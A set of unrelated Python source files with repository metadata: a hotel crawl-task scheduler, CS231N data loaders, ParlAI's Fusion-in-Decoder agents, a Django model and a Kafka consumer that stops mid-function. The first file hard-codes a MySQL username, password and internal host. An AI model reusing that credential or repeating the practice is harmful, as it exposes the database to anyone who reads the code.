3544578b5eba352958bb896b645b4312ea39834f | 769c8cac5aea3c9cb1e7eeafb1e37dbe9ea4d649 | /TaskScheduler/hotel_list_task.py | 0bee18d0d9cf36192d1c2f1f2dd5ddf676443a6a | [] | no_license | 20113261/p_m | f0b93b516e4c377aaf8b1741671759822ee0ec1a | ca7713de005c4c10e5cae547851a38a13211b71d | refs/heads/master | 2020-03-20T01:03:29.785618 | 2018-03-17T11:06:49 | 2018-03-17T11:06:49 | 137,065,177 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2017/7/11 下午5:30
# @Author : Hou Rong
# @Site :
# @File : hotel_list_task.py
# @Software: PyCharm
import Common.DateRange
import dataset
from Common.DateRange import dates_tasks
from TaskScheduler.TaskInsert import InsertTask
# Override the project-wide date format used by dates_tasks() below.
Common.DateRange.DATE_FORMAT = '%Y%m%d'
# NOTE(review): database credentials are hard-coded in this connection URL;
# consider moving them to configuration or environment variables.
db = dataset.connect('mysql+pymysql://reader:mioji1109@10.19.118.147/source_info?charset=utf8')
if __name__ == '__main__':
    # Queue one crawl task per (ctrip city, check-in date) combination.
    with InsertTask(worker='hotel_list', task_name='ctrip_hotel_list_0711') as it:
        for line in db.query('''SELECT city_id
FROM hotel_suggestions_city
WHERE source = 'ctrip' AND select_index != -1 AND annotation != -1;'''):
            city_id = line['city_id']
            # Presumably generates check-in dates up to 90 days ahead in
            # 10-day steps, skipping the first 20 days — TODO confirm against
            # Common.DateRange.dates_tasks.
            for day in dates_tasks(90, day_step=10, ignore_days=20):
                args = {'source': 'ctrip', 'city_id': city_id, 'check_in': day,
                        'part': '20170711'}
                it.insert_task(args)
| [
"nmghr9@gmail.com"
] | nmghr9@gmail.com |
7ac936ecd5083f62b8a3b206f7e560a01d51ac58 | e0a9dcd4f53aa6bf4472efe451e226663212abda | /core/execute.py | d8d444c3f1a16fa7af00f3de0f4f8ca5d7541d09 | [] | no_license | dilawar/ghonchu | f0505dce8ba76402e7c58c7fc4efd0412ce3503a | 5527b4d444f113b0ab51f758fc809e8ab81c5a72 | refs/heads/master | 2016-09-02T05:33:07.167106 | 2014-12-12T12:07:50 | 2014-12-12T12:07:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 515 | py |
"""execute.py: Execute core action.
Last modified: Sat Jan 18, 2014 05:01PM
"""
__author__ = "Dilawar Singh"
__copyright__ = "Copyright 2013, Dilawar Singh and NCBS Bangalore"
__credits__ = ["NCBS Bangalore"]
__license__ = "GNU GPL"
__version__ = "1.0.0"
__maintainer__ = "Dilawar Singh"
__email__ = "dilawars@ncbs.res.in"
__status__ = "Development"
from notes import note
def new_note(title):
    """Create a note with the given title and write it."""
    note.Note(title).write()
| [
"dilawars@ncbs.res.in"
] | dilawars@ncbs.res.in |
cf1dd697de86f1bd9befeb47c8cb1caa88300d4e | 35823cfdaebca1364f0cfd0993c4e0c3b5dcf762 | /assignment3/cs231n/data_utils.py | 7a5e5d79a6a0ff754fca40361b812d22da6905c0 | [] | no_license | Richardyu114/CS231N-notes-and-assignments | b072e693a6766694fe7a2642de50a52c11fbfe0d | 25b9dac4834fabebc6d9453722bef6e5bea66b0c | refs/heads/master | 2021-03-07T06:53:18.840432 | 2020-07-08T13:33:00 | 2020-07-08T13:33:00 | 246,252,293 | 1 | 0 | null | 2020-11-18T22:43:24 | 2020-03-10T08:58:02 | Jupyter Notebook | UTF-8 | Python | false | false | 9,179 | py | from __future__ import print_function
from builtins import range
from six.moves import cPickle as pickle
import numpy as np
import os
from scipy.misc import imread
import platform
def load_pickle(f):
    """Unpickle from an open binary file, handling the py2/py3 encoding split."""
    version = platform.python_version_tuple()
    major = version[0]
    if major == '2':
        return pickle.load(f)
    if major == '3':
        # latin1 keeps byte values intact when reading py2-written pickles.
        return pickle.load(f, encoding='latin1')
    raise ValueError("invalid python version: {}".format(version))
def load_CIFAR_batch(filename):
    """Load one CIFAR-10 batch file and return (images, labels).

    Images come back as float arrays of shape (10000, 32, 32, 3).
    """
    with open(filename, 'rb') as fh:
        batch = load_pickle(fh)
        images = (
            batch['data']
            .reshape(10000, 3, 32, 32)
            .transpose(0, 2, 3, 1)
            .astype("float")
        )
        labels = np.array(batch['labels'])
    return images, labels
def load_CIFAR10(ROOT):
    """Load all of CIFAR-10: five training batches plus the test batch.

    Returns (Xtr, Ytr, Xte, Yte).
    """
    train_parts = [
        load_CIFAR_batch(os.path.join(ROOT, 'data_batch_%d' % b))
        for b in range(1, 6)
    ]
    Xtr = np.concatenate([images for images, _ in train_parts])
    Ytr = np.concatenate([labels for _, labels in train_parts])
    Xte, Yte = load_CIFAR_batch(os.path.join(ROOT, 'test_batch'))
    return Xtr, Ytr, Xte, Yte
def get_CIFAR10_data(num_training=49000, num_validation=1000, num_test=1000,
                     subtract_mean=True):
    """
    Load the CIFAR-10 dataset from disk and perform preprocessing to prepare
    it for classifiers: split into train/val/test, optionally subtract the
    training mean image, and move channels first.
    """
    cifar10_dir = 'cs231n/datasets/cifar-10-batches-py'
    X_train, y_train, X_test, y_test = load_CIFAR10(cifar10_dir)

    # Carve the validation split out of the tail of the training set.
    X_val = X_train[num_training:num_training + num_validation]
    y_val = y_train[num_training:num_training + num_validation]
    X_train = X_train[:num_training]
    y_train = y_train[:num_training]
    X_test = X_test[:num_test]
    y_test = y_test[:num_test]

    # Normalize by the training-set mean image when requested.
    if subtract_mean:
        mean_image = X_train.mean(axis=0)
        X_train = X_train - mean_image
        X_val = X_val - mean_image
        X_test = X_test - mean_image

    # Channels-first layout (N, C, H, W) for the conv nets.
    X_train = X_train.transpose(0, 3, 1, 2).copy()
    X_val = X_val.transpose(0, 3, 1, 2).copy()
    X_test = X_test.transpose(0, 3, 1, 2).copy()

    return {
        'X_train': X_train, 'y_train': y_train,
        'X_val': X_val, 'y_val': y_val,
        'X_test': X_test, 'y_test': y_test,
    }
def load_tiny_imagenet(path, dtype=np.float32, subtract_mean=True):
    """
    Load TinyImageNet. Each of TinyImageNet-100-A, TinyImageNet-100-B, and
    TinyImageNet-200 have the same directory structure, so this can be used
    to load any of them.

    Inputs:
    - path: String giving path to the directory to load.
    - dtype: numpy datatype used to load the data.
    - subtract_mean: Whether to subtract the mean training image.

    Returns: A dictionary with the following entries:
    - class_names: A list where class_names[i] is a list of strings giving the
      WordNet names for class i in the loaded dataset.
    - X_train: (N_tr, 3, 64, 64) array of training images
    - y_train: (N_tr,) array of training labels
    - X_val: (N_val, 3, 64, 64) array of validation images
    - y_val: (N_val,) array of validation labels
    - X_test: (N_test, 3, 64, 64) array of testing images.
    - y_test: (N_test,) array of test labels; if test labels are not available
      (such as in student code) then y_test will be None.
    - mean_image: (3, 64, 64) array giving mean training image

    NOTE(review): relies on ``scipy.misc.imread``, which was removed from
    SciPy 1.2+ — this module needs SciPy < 1.2 (or a port to imageio/PIL).
    """
    # First load wnids
    with open(os.path.join(path, 'wnids.txt'), 'r') as f:
        wnids = [x.strip() for x in f]
    # Map wnids to integer labels
    wnid_to_label = {wnid: i for i, wnid in enumerate(wnids)}
    # Use words.txt to get names for each class
    with open(os.path.join(path, 'words.txt'), 'r') as f:
        wnid_to_words = dict(line.split('\t') for line in f)
        for wnid, words in wnid_to_words.items():
            wnid_to_words[wnid] = [w.strip() for w in words.split(',')]
    class_names = [wnid_to_words[wnid] for wnid in wnids]
    # Next load training data.
    X_train = []
    y_train = []
    for i, wnid in enumerate(wnids):
        if (i + 1) % 20 == 0:
            print('loading training data for synset %d / %d'
                  % (i + 1, len(wnids)))
        # To figure out the filenames we need to open the boxes file
        boxes_file = os.path.join(path, 'train', wnid, '%s_boxes.txt' % wnid)
        with open(boxes_file, 'r') as f:
            filenames = [x.split('\t')[0] for x in f]
        num_images = len(filenames)
        X_train_block = np.zeros((num_images, 3, 64, 64), dtype=dtype)
        y_train_block = wnid_to_label[wnid] * \
            np.ones(num_images, dtype=np.int64)
        for j, img_file in enumerate(filenames):
            img_file = os.path.join(path, 'train', wnid, 'images', img_file)
            img = imread(img_file)
            if img.ndim == 2:
                ## grayscale file
                img.shape = (64, 64, 1)
            X_train_block[j] = img.transpose(2, 0, 1)
        X_train.append(X_train_block)
        y_train.append(y_train_block)
    # We need to concatenate all training data
    X_train = np.concatenate(X_train, axis=0)
    y_train = np.concatenate(y_train, axis=0)
    # Next load validation data
    with open(os.path.join(path, 'val', 'val_annotations.txt'), 'r') as f:
        img_files = []
        val_wnids = []
        for line in f:
            img_file, wnid = line.split('\t')[:2]
            img_files.append(img_file)
            val_wnids.append(wnid)
    num_val = len(img_files)
    y_val = np.array([wnid_to_label[wnid] for wnid in val_wnids])
    X_val = np.zeros((num_val, 3, 64, 64), dtype=dtype)
    for i, img_file in enumerate(img_files):
        img_file = os.path.join(path, 'val', 'images', img_file)
        img = imread(img_file)
        if img.ndim == 2:
            img.shape = (64, 64, 1)
        X_val[i] = img.transpose(2, 0, 1)
    # Next load test images
    # Students won't have test labels, so we need to iterate over files in the
    # images directory.
    img_files = os.listdir(os.path.join(path, 'test', 'images'))
    X_test = np.zeros((len(img_files), 3, 64, 64), dtype=dtype)
    for i, img_file in enumerate(img_files):
        img_file = os.path.join(path, 'test', 'images', img_file)
        img = imread(img_file)
        if img.ndim == 2:
            img.shape = (64, 64, 1)
        X_test[i] = img.transpose(2, 0, 1)
    y_test = None
    y_test_file = os.path.join(path, 'test', 'test_annotations.txt')
    if os.path.isfile(y_test_file):
        with open(y_test_file, 'r') as f:
            img_file_to_wnid = {}
            for line in f:
                line = line.split('\t')
                img_file_to_wnid[line[0]] = line[1]
        y_test = [wnid_to_label[img_file_to_wnid[img_file]]
                  for img_file in img_files]
        y_test = np.array(y_test)
    mean_image = X_train.mean(axis=0)
    if subtract_mean:
        X_train -= mean_image[None]
        X_val -= mean_image[None]
        X_test -= mean_image[None]
    # BUG FIX: the returned dict previously listed 'class_names' twice;
    # the duplicate entry has been removed (the value was identical).
    return {
        'class_names': class_names,
        'X_train': X_train,
        'y_train': y_train,
        'X_val': X_val,
        'y_val': y_val,
        'X_test': X_test,
        'y_test': y_test,
        'mean_image': mean_image,
    }
def load_models(models_dir):
    """
    Load saved models from disk. This will attempt to unpickle all files in a
    directory; any files that give errors on unpickling (such as README.txt)
    will be skipped.

    Inputs:
    - models_dir: String giving the path to a directory containing model files.
      Each model file is a pickled dictionary with a 'model' field.

    Returns:
    A dictionary mapping model file names to models.
    """
    models = {}
    for name in os.listdir(models_dir):
        path = os.path.join(models_dir, name)
        with open(path, 'rb') as fh:
            try:
                models[name] = load_pickle(fh)['model']
            except pickle.UnpicklingError:
                # Not a pickle (e.g. README.txt) — skip it.
                continue
    return models
def load_imagenet_val(num=None):
    """Load a handful of validation images from ImageNet.

    Inputs:
    - num: Number of images to load (max of 25)

    Returns:
    - X: numpy array with shape [num, 224, 224, 3]
    - y: numpy array of integer image labels, shape [num]
    - class_names: dict mapping integer label to class name
    """
    imagenet_fn = 'cs231n/datasets/imagenet_val_25.npz'
    if not os.path.isfile(imagenet_fn):
        print('file %s not found' % imagenet_fn)
        print('Run the following:')
        print('cd cs231n/datasets')
        print('bash get_imagenet_val.sh')
        assert False, 'Need to download imagenet_val_25.npz'
    archive = np.load(imagenet_fn)
    X, y = archive['X'], archive['y']
    class_names = archive['label_map'].item()
    if num is not None:
        X, y = X[:num], y[:num]
    return X, y, class_names
| [
"noreply@github.com"
] | noreply@github.com |
ac1d8d944c5f717513c16db9d6c67f9b7c3dbdf2 | 2176a24055451d189e1c1a9a87ef4eeefea681ec | /parlai/agents/fid/fid.py | 3e0e65079659d4846dedd5a7d66d649c96fb19f5 | [
"MIT"
] | permissive | khanhgithead/ParlAI | c4b7f9288702b20093a1821cfd6b48ab1b26b1ba | 598cd8cfb46f831c52237da97600d7849f2b711b | refs/heads/master | 2022-02-15T12:07:37.428392 | 2022-01-14T18:01:33 | 2022-01-14T18:01:33 | 157,932,342 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,924 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Leveraging Passage Retrieval with Generative Models for Open Domain Question Answering.
See https://arxiv.org/abs/2007.01282
"""
from abc import abstractmethod
from copy import deepcopy
import torch
import random
from typing import Tuple, Union, Optional, List, Dict, Any
from parlai.core.dict import DictionaryAgent
from parlai.core.opt import Opt
from parlai.core.message import Message
from parlai.agents.transformer.transformer import TransformerGeneratorModel
from parlai.agents.rag.args import RetrieverType
from parlai.agents.rag.modules import RagModel, Document, T5RagModel
from parlai.agents.rag.rag import RagAgent
from parlai.agents.rag.model_types import (
RagToken,
get_forced_decoder_inputs,
fix_incremental_state,
)
from parlai.utils.typing import TShared
import parlai.utils.logging as logging
from parlai.tasks.wizard_of_internet import constants as consts
class Fid(RagToken):
    """
    FiD mimics RAG Token interface in many ways; we simply need to adjust the decoder
    inputs to not repeat, as FiD attends over all encoder outputs jointly.
    """
    def get_initial_forced_decoder_input(
        self,
        bsz: int,
        inputs: torch.LongTensor,
        n_docs: int,
        start_idx: int,
        end_idx: int,
        input_turns_cnt: Optional[torch.LongTensor] = None,
    ) -> torch.Tensor:
        # Unlike RAG-Token, FiD does NOT repeat the forced decoder input per
        # retrieved document (encoder outputs are concatenated instead);
        # n_docs and input_turns_cnt are accepted only for interface
        # compatibility and are unused here.
        return get_forced_decoder_inputs(
            inputs, bsz, start_idx, end_idx, self.generation_model
        )
    def get_initial_decoder_input(self, input: torch.LongTensor) -> torch.LongTensor:
        # Generation starts from the provided input as-is: no per-document
        # expansion is required.
        return input
    def get_next_decoder_input(
        self,
        prev_input: torch.LongTensor,
        selection: torch.LongTensor,
        incr_state_inds: torch.LongTensor,
    ) -> torch.LongTensor:
        # Reorder the running decoder input to follow beam reordering, then
        # append the newly selected tokens along the sequence dimension.
        prev_input = torch.index_select(prev_input, 0, incr_state_inds)  # type: ignore
        decoder_input = torch.cat([prev_input, selection], dim=-1)
        return decoder_input  # type: ignore
class FidModel(RagModel):
"""
The FiD Model is a simpler version of the RAG Model.
We override the encoder and decoder methods to join encoder outputs, and decode
normally, respectively.
"""
    def __init__(self, opt: Opt, dictionary: DictionaryAgent, retriever_shared=None):
        """Initialize as a RagModel, then swap in the FiD decoder-input interface."""
        super().__init__(opt, dictionary, retriever_shared=retriever_shared)
        self._rag_model_interface = Fid(opt, dictionary[dictionary.null_token])
        # Cached for concatenating encoder outputs in self.encoder.
        self.embedding_size = opt['embedding_size']
    def reorder_encoder_states(
        self,
        encoder_states: Tuple[torch.Tensor, ...],
        indices: Union[List[int], torch.LongTensor],
    ) -> Tuple[torch.Tensor, torch.Tensor, List[List[Document]], torch.Tensor]:
        """
        Override RagModel.reorder_encoder_states to make sure we only pass enc, mask.
        See ``TorchGeneratorModel.reorder_encoder_states`` for a description.
        """
        # Drop the extra RAG state (doc lists / scores); once encoder outputs
        # are concatenated, only (enc, mask) need reordering.
        enc, mask, *_ = encoder_states
        return TransformerGeneratorModel.reorder_encoder_states(
            self, (enc, mask), indices
        )
    def reorder_decoder_incremental_state(
        self, incremental_state: Dict[int, dict], inds: torch.Tensor
    ) -> Dict[int, dict]:
        """
        Override RagModel.reorder_decoder_incremental_state to resort back to normal
        reordering.
        See ``TorchGeneratorModel.reorder_decoder_incremental_state`` for a description.
        """
        incremental_state = fix_incremental_state(
            self.generation_model, incremental_state
        )
        # Some generation models yield no incremental state; nothing to reorder.
        if not incremental_state:
            return incremental_state
        # Standard per-layer reordering, as in TorchGeneratorModel.
        return {
            idx: layer.reorder_incremental_state(incremental_state[idx], inds)
            for idx, layer in enumerate(self.seq2seq_decoder.layers)
        }
def encoder(
self,
input: torch.LongTensor,
input_lengths: torch.LongTensor,
query_vec: torch.LongTensor,
input_turns_cnt: torch.LongTensor,
positions: Optional[torch.LongTensor] = None,
segments: Optional[torch.LongTensor] = None,
) -> Tuple[
torch.Tensor,
torch.BoolTensor,
Optional[torch.LongTensor],
Optional[List[List[Document]]],
Optional[torch.Tensor],
]:
"""
Concatenate all encoder outputs in model forward.
:param input:
2D [bsz, seqlen] input to the encoder
:param input_lengths:
1D [bsz] lengths of each input item
:param query_vec:
2D [bsz*n_turns, seqlen] input for the retriever
:param input_turns_cnt:
1D [bsz] number of dialogue turns for each input example
:return (encoder_out, encoder_mask, input_turns_cnt, top_docs, top_doc_scores):
encoder_out: *concatenated* encoded representations of context/document pairs
encoder_mask: new mask for enc_out
input_turns_cnt: pass along the input turns count for the decoder
top_docs: List of top Documents for each batch example
top_doc_scores: scores for each retrieved document.
"""
enc_out, mask, input_turns_cnt, top_docs, top_doc_scores = super().encoder(
input, input_lengths, query_vec, input_turns_cnt, positions, segments
) # type: ignore
if input_turns_cnt is not None:
# Input Turns is a tensor of dim [bsz]
input = input.repeat_interleave(input_turns_cnt, dim=0) # type: ignore
new_out, new_mask = concat_enc_outs(
input, enc_out, mask, self.embedding_size, self.pad_idx
)
return new_out, new_mask, input_turns_cnt, top_docs, top_doc_scores
def decoder(
self,
input: torch.LongTensor,
encoder_state: Tuple[Any, ...],
incr_state: Optional[Dict[str, Any]] = None,
) -> Tuple[torch.Tensor, Optional[Dict[str, Any]]]:
"""
Decode, RAG-Style.
:param input:
input for the decoder
:param encoder_state:
RAG encoder states
:param incr_state:
incremental decoder state
:return (output, new_incr_state):
return the output token distribution, as well as new incremental state.
"""
enc_out, enc_mask, *_ = encoder_state
dec_out, incr_state = self.seq2seq_decoder(
input, (enc_out, enc_mask), incr_state
) # type: ignore
dec_out = self.decoder_output(dec_out)
return dec_out, incr_state
class T5FidModel(FidModel, T5RagModel):
def __init__(self, opt: Opt, dictionary: DictionaryAgent, retriever_shared=None):
super().__init__(opt, dictionary, retriever_shared=retriever_shared)
self.embedding_size = self.t5.model_dim
class FidAgent(RagAgent):
"""
Fusion in Decoder Agent.
Fusion in Decoder is very similar to RAG; each requires a retrieval and subsequent
generation step.
The difference is that FiD will encode all documents in parallel in encoder,
concatenate, and feed as one giant encoding to Decoder.
This forces the Decoder to attend over the several documents directly,
rather than marginalizing later.
As such, FidAgent is a natural extension of the RagAgent. I've extracted out to its
own agent for ease of use.
"""
@property
def rag_model_type(self) -> str:
return self._rag_model_type
@rag_model_type.setter
def rag_model_type(self, model: str):
self._rag_model_type = model
self._rag_model_interface = Fid(self.opt, self.NULL_IDX)
def build_model(self) -> FidModel:
if self.generation_model == 't5':
model = T5FidModel(self.opt, self.dict)
else:
model = FidModel(self.opt, self.dict)
if self.opt['embedding_type'] != 'random':
self._copy_embeddings(
model.encoder.embeddings.weight, self.opt['embedding_type']
)
return model
RETRIEVER_DOC_LEN_TOKENS = 256
class SearchQueryFiDAgent(FidAgent):
@classmethod
def add_cmdline_args(cls, parser, partial_opt=None):
super().add_cmdline_args(parser, partial_opt=partial_opt)
group = parser.add_argument_group('Search Query FiD Params')
# Search Query generator
group.add_argument(
'--search-query-generator-model-file',
type=str,
help='Path to a query generator model.',
)
group.add_argument(
'--search-query-generator-inference',
type=str,
default='greedy',
help='Generation algorithm for the search query generator model',
)
group.add_argument(
'--search-query-generator-beam-min-length',
type=int,
default=1,
help='The beam_min_length opt for the search query generator model',
)
group.add_argument(
'--search-query-generator-beam-size',
type=int,
default=1,
help='The beam_size opt for the search query generator model',
)
group.add_argument(
'--search-query-generator-text-truncate',
type=int,
default=512,
help='Truncates the input to the search query generator model',
)
# Creating chunks and spliting the documents
group.add_argument(
'--splitted-chunk-length',
type=int,
default=RETRIEVER_DOC_LEN_TOKENS,
help='The number of tokens in each document split',
)
group.add_argument(
'--doc-chunk-split-mode',
type=str,
choices=['word', 'token'],
default='word',
help='split the docs by white space (word) or dict tokens.',
)
group.add_argument(
'--n-ranked-doc-chunks',
type=int,
default=1,
help='Number of document chunks to keep if documents is too long and has to be splitted.',
)
group.add_argument(
'--doc-chunks-ranker',
type=str,
choices=['tfidf', 'head', 'woi_chunk_retrieved_docs'],
default='head',
help='How to rank doc chunks.',
)
parser.add_argument(
'--woi-doc-chunk-size',
default=500,
type=int,
help='Document chunk size (in characters).',
)
return parser
class SearchQuerySearchEngineFiDAgent(SearchQueryFiDAgent):
def __init__(self, opt: Opt, shared: TShared = None):
opt = deepcopy(opt)
opt['rag_retriever_type'] = RetrieverType.SEARCH_ENGINE.value
super().__init__(opt, shared=shared)
@classmethod
def add_cmdline_args(cls, parser, partial_opt=None):
super().add_cmdline_args(parser, partial_opt=partial_opt)
group = parser.add_argument_group('Search Engine FiD Params')
group.add_argument('--search-server', type=str, help='A search server address.')
return parser
class SearchQueryFAISSIndexFiDAgent(SearchQueryFiDAgent):
def __init__(self, opt: Opt, shared: TShared = None):
opt = deepcopy(opt)
opt['rag_retriever_type'] = RetrieverType.SEARCH_TERM_FAISS.value
super().__init__(opt, shared=shared)
class GoldDocRetrieverFiDAgent(SearchQueryFiDAgent):
"""
Uses the gold retrieved docs (documents shown to crowdsourcing agents).
This FiD agents has a mock retriever that picks the retrieved docs from the observed
example.
"""
def __init__(self, opt: Opt, shared: TShared = None):
opt = deepcopy(opt)
opt['rag_retriever_type'] = RetrieverType.OBSERVATION_ECHO_RETRIEVER.value
self._n_docs = opt['n_docs']
if opt['rag_retriever_query'] != 'full_history':
prev_sel = opt['rag_retriever_query']
opt['rag_retriever_query'] = 'full_history'
logging.warning(
'GoldDocRetrieverFiDAgent only works with `rag_retriever_query` being `"full_history"`. '
f'Changing opt value for `rag_retriever_query`: `"{prev_sel}"` -> `"full_history"`'
)
super().__init__(opt, shared=shared)
@abstractmethod
def get_retrieved_knowledge(self, message):
"""
Extracts the retrieved knowledge from the message.
"""
def show_observation_to_echo_retriever(self, observation: Message):
retrieved_docs = self.get_retrieved_knowledge(observation)
if len(retrieved_docs) > self._n_docs:
logging.warning(
f'Your `get_retrieved_knowledge` method returned {len(retrieved_docs)} Documents, '
f'instead of the expected {self._n_docs} (set by `--n-docs`). '
f'This agent will only use the first {self._n_docs} Documents. '
'Consider modifying your implementation of `get_retrieved_knowledge` to avoid unexpected results. '
'(or alternatively you may increase `--n-docs` parameter)'
)
retrieved_docs = retrieved_docs[: self._n_docs]
self.model_api.retriever.add_retrieve_doc(
observation[self._query_key], retrieved_docs
)
def _set_query_vec(self, observation: Message) -> Message:
self.show_observation_to_echo_retriever(observation)
super()._set_query_vec(observation)
class WizIntGoldDocRetrieverFiDAgent(GoldDocRetrieverFiDAgent):
"""
Gold knowledge FiD agent for the Wizard of Internet task.
"""
def _extract_doc_from_message(self, message: Message, idx: int):
"""
Returns the `idx`-th `__retrieved-docs__` in the `message` as a Document object.
"""
return Document(
docid=message[consts.RETRIEVED_DOCS_URLS][idx],
title=message[consts.RETRIEVED_DOCS_TITLES][idx],
text=message[consts.RETRIEVED_DOCS][idx],
)
def get_retrieved_knowledge(self, message: Message):
retrieved_docs = []
if not message.get(consts.RETRIEVED_DOCS):
return retrieved_docs
# First adding the docs with selected sentences.
selected_sentences = message[consts.SELECTED_SENTENCES]
n_docs_in_message = len(message[consts.RETRIEVED_DOCS])
already_added_doc_idx = []
if ' '.join(selected_sentences) == consts.NO_SELECTED_SENTENCES_TOKEN:
return retrieved_docs # `retrieved_docs` is empty at this point
for doc_idx in range(n_docs_in_message):
doc_content = message[consts.RETRIEVED_DOCS][doc_idx]
for sel_sentc in selected_sentences:
if sel_sentc in doc_content:
retrieved_docs.append(
self._extract_doc_from_message(message, doc_idx)
)
already_added_doc_idx.append(doc_idx)
break
if len(retrieved_docs) == self._n_docs and doc_idx != (self._n_docs - 1):
logging.warning(
f'More than {self._n_docs} documents have selected sentences. Trimming them to the first {self._n_docs}'
)
break
# Then adding other (filler) docs.
# We add them by iterating forward in the __retrieved-docs__ list for repeatability,
# but we shuffle the order of the final retruned docs, to make sure model doesn't cheat.
for doc_idx in range(n_docs_in_message):
if len(retrieved_docs) == self._n_docs:
break
if doc_idx in already_added_doc_idx:
continue
retrieved_docs.append(self._extract_doc_from_message(message, doc_idx))
if n_docs_in_message > len(retrieved_docs):
logging.debug(
f'Trimmed retrieved docs from {n_docs_in_message} to {len(retrieved_docs)}'
)
random.shuffle(retrieved_docs)
return retrieved_docs
def concat_enc_outs(
input: torch.LongTensor,
enc_out: torch.Tensor,
mask: torch.BoolTensor,
embedding_size: int,
padding_idx: int,
) -> Tuple[torch.Tensor, torch.BoolTensor]:
"""
Concatenate Encoder Outputs.
Does the whole "FiD" thing; each query/document pair is independently encoded in the
Encoder, so we need to concatenate all the outputs prior to sending to the decoder.
:param input:
[bsz, seqlen] original input to the encoder
:param enc_out:
[bsz * n_docs, seqlen] output representations from the encoder
:param mask:
encoder mask
:param embedding_size:
emb/hidden size of the enc representations
:param padding_idx:
pad token index; used for mask purposes.
:return (new_out, new_mask):
return the encoder output and encoder mask, appropriately concatenated.
"""
bsz, n_docs = input.size(0), enc_out.size(0) // input.size(0)
split_enc_out = enc_out.split([n_docs] * bsz, dim=0)
split_mask = mask.split([n_docs] * bsz, dim=0)
concat_outs: List[torch.Tensor] = []
concat_lengths = []
for i in range(bsz):
mask_i = split_mask[i].view(-1)
out_i = split_enc_out[i].reshape(-1, embedding_size)[mask_i]
concat_outs.append(out_i)
concat_lengths.append(out_i.size(0))
new_out = enc_out.new(bsz, max(concat_lengths), embedding_size)
new_mask: torch.BoolTensor = mask.new(bsz, max(concat_lengths)) # type: ignore
new_out.fill_(padding_idx)
new_mask.fill_(False)
for i, (out_i, length_i) in enumerate(zip(concat_outs, concat_lengths)):
new_out[i, :length_i] = out_i
new_mask[i, :length_i] = True
return new_out, new_mask
| [
"noreply@github.com"
] | noreply@github.com |
105947379a933fb3d9c7594e0f9ee5edef5ec989 | 659836ef3a9ac558538b016dbf4e128aa975ae7c | /backend/ingredient/models.py | ba8262719d98f47795c66d3d2646c01dcfba676b | [] | no_license | zzerii/save_your_ingredients | fda1c769d158bca9dfd3c28ac9ff34ed7ae4e6a3 | 5ebde82255c1a6edf0c19d9032015d05c9d0abc9 | refs/heads/master | 2023-02-21T22:19:28.954594 | 2021-01-22T11:39:16 | 2021-01-22T11:39:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 223 | py | from django.db import models
# Create your models here.
class Ingredient(models.Model):
name = models.CharField(max_length=255)
info = models.CharField(max_length=255)
trim = models.CharField(max_length=255)
| [
"jinsoo941010@naver.com"
] | jinsoo941010@naver.com |
754d441707341b8ba8d827ed526ecce1b52c54ed | fd4dd0ce51eb1c9206d5c1c29d6726fc5f2cb122 | /src/kafka_consumer.py | 2c15842317f104c1081a9e44920ee8bec1234986 | [] | no_license | kbaseapps/relation_engine_sync | 0a9ae11326245b98bd173d77203ff49ccd222165 | def99d329d0d4101f3864e21a3e1a6ecb34fa6e0 | refs/heads/master | 2020-04-12T13:07:27.771094 | 2019-08-05T23:53:50 | 2019-08-05T23:53:50 | 162,512,534 | 0 | 0 | null | 2019-08-05T23:53:51 | 2018-12-20T01:56:13 | Python | UTF-8 | Python | false | false | 3,996 | py | """
Consume workspace update events from kafka.
"""
import json
import traceback
from confluent_kafka import Consumer, KafkaError
from src.utils.logger import log
from src.utils.config import get_config
from src.utils.workspace_client import download_info
from src.utils.re_client import check_doc_existence
from src.import_object import import_object
_CONFIG = get_config()
def run():
"""Run the main event loop, ie. the Kafka Consumer, dispatching to self._handle_message."""
topics = [
_CONFIG['kafka_topics']['workspace_events'],
_CONFIG['kafka_topics']['re_admin_events']
]
log('INFO', f"Subscribing to: {topics}")
log('INFO', f"Client group: {_CONFIG['kafka_clientgroup']}")
log('INFO', f"Kafka server: {_CONFIG['kafka_server']}")
consumer = Consumer({
'bootstrap.servers': _CONFIG['kafka_server'],
'group.id': _CONFIG['kafka_clientgroup'],
'auto.offset.reset': 'earliest',
'enable.auto.commit': True
})
consumer.subscribe(topics)
while True:
msg = consumer.poll(timeout=0.5)
if msg is None:
continue
if msg.error():
if msg.error().code() == KafkaError._PARTITION_EOF:
log('INFO', 'End of stream.')
else:
log('ERROR', f"Kafka message error: {msg.error()}")
continue
val = msg.value().decode('utf-8')
try:
msg = json.loads(val)
log('INFO', f'New message: {msg}')
_handle_msg(msg)
except Exception as err:
log('ERROR', '=' * 80)
log('ERROR', f"Error importing:\n{type(err)} - {err}")
log('ERROR', msg)
log('ERROR', err)
# Prints to stderr
traceback.print_exc()
log('ERROR', '=' * 80)
consumer.close()
def _handle_msg(msg):
"""Receive a kafka message."""
event_type = msg.get('evtype')
wsid = msg.get('wsid')
if not wsid:
raise RuntimeError(f'Invalid wsid in event: {wsid}')
if not event_type:
raise RuntimeError(f"Missing 'evtype' in event: {msg}")
log('INFO', f'Received {msg["evtype"]} for {wsid}/{msg.get("objid", "?")}')
if event_type in ['IMPORT', 'NEW_VERSION', 'COPY_OBJECT', 'RENAME_OBJECT']:
_import_obj(msg)
elif event_type == 'IMPORT_NONEXISTENT':
_import_nonexistent(msg)
elif event_type == 'OBJECT_DELETE_STATE_CHANGE':
_delete_obj(msg)
elif event_type == 'WORKSPACE_DELETE_STATE_CHANGE':
_delete_ws(msg)
elif event_type in ['CLONE_WORKSPACE', 'IMPORT_WORKSPACE']:
_import_ws(msg)
elif event_type == 'SET_GLOBAL_PERMISSION':
_set_global_perms(msg)
else:
raise RuntimeError(f"Unrecognized event {event_type}.")
def _import_obj(msg):
log('INFO', 'Downloading obj')
obj_info = download_info(msg['wsid'], msg['objid'], msg.get('ver'))
import_object(obj_info)
def _import_nonexistent(msg):
"""Import an object only if it does not exist in RE already."""
upa = ':'.join([str(p) for p in [msg['wsid'], msg['objid'], msg['ver']]])
log('INFO', f'_import_nonexistent on {upa}') # TODO
_id = 'wsfull_object_version/' + upa
